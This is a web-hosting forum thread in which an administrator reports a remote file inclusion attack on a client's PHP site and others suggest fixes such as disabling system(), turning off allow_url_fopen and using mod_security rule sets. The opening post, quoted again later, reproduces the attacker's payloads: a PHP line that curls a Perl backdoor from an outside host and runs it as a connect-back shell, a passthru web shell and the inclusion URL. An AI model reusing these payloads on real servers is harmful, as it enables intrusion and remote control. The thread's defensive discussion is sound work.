Help, hacker uploading files /tmp with external PHP code

[jeroman8]

Hi!

A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.

Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows

 

[claudio]

Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

i wrote a small perl script that i use as a cron each 10 minutes looking for strange files in my /tmp

then by the time i can grep all .php in domlogs and the execute some of the pages in order to discover which of then is causing the file injection or jamming it on /tmp

good luck ; )

Claudio

 

[nickp666]

mod_security and a good rule set should stop most of those type of attacks, catches a lot on one of my boxes, also mounting /tmp noexec would be a good idea, this has been discussed many times on this board so just do a search

 

[jackie46]

Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

Really, care to enlighten all of use as to how you would disable safe mode on an individual basis?

 

[mOdY]

Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

i wrote a small perl script that i use as a cron each 10 minutes looking for strange files in my /tmp

then by the time i can grep all .php in domlogs and the execute some of the pages in order to discover which of then is causing the file injection or jamming it on /tmp

good luck ; )

Claudio

nice thingy, would be nice if you shared it with us.

 

[HostMerit]

Get mod_security and a good ruleset, and use this code:

SecFilter "page=http"

The problem is poorly written PHP code that just fopen's a page / URL and doesn't check / use an array to grab from.

 

[destr0yr]

Upgrading your PHP CMS/blog/forum/whatever would be the ultimate solution. index2.php looks mambo-ish. make sure you client is running the most current version - go so far as to disable their site until they do upgarde. Security should be as large an issue for them as it is for you (IMHO).

As for mod_security, use it, love it, embrace it, be one with it.

Current ruleset that works for me:

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"

# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"

#More PHPBB worms
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"

 

[Nick A]

Hi!

A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.

Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows

Hi Have u run /scripts/securetmp before?

 

[HostMerit]

Securetmp wouldn't help, as it's running a perl script.

You can try chmod 750 /usr/bin/wget and also chmod 750 /usr/bin/curl

As curl is being used to download the item. Many different ways to secure against this attack.

 

[jeroman8]

Thanks guys for your help in this matter!

Upgrading the script is not easy since it's not a public script.
noexec/securetmp for temp is off course already done but that doesn't help, never did.
I already use almost all Hostmerits mod_sec rules but blocking "http" will block all "good" requests also and is to much on this server since many use external images, include pages etc with php. Off course security should come first but theres a client/money issue also.
chmod 750 curl and wget is the same thing as removing the functions for the clients - many use it.

However disable "system" seems to fix this issue with this script !!

I also have a script checking /tmp and any other catalog I like.
I set what it should look for and not look for and where and then it email whenever
for exempal a "hack.pl" och "bc.tar"....is being created in /tmp.

You can find it and other good scripts here:
http://forums.cpanel.net/showthread.php?t=25672&highlight=PWS+monitor

 

[webicom]

Try to set allow_url_fopen = Off. You can find that in php.ini file.

Regards, Erik

 

[rogcan]

How do you add that ruleset for mod_security by the way ??

Can i get a step by step instruction for that please as i would like to use yours destr0yr

 

[ramprage]

destr0yr

The ruleset destr0yr is using looks like the default for mod_security and won't help much.

You need to login by shell and have the ruleset edited then restart apache. If you have more questions about this PM me.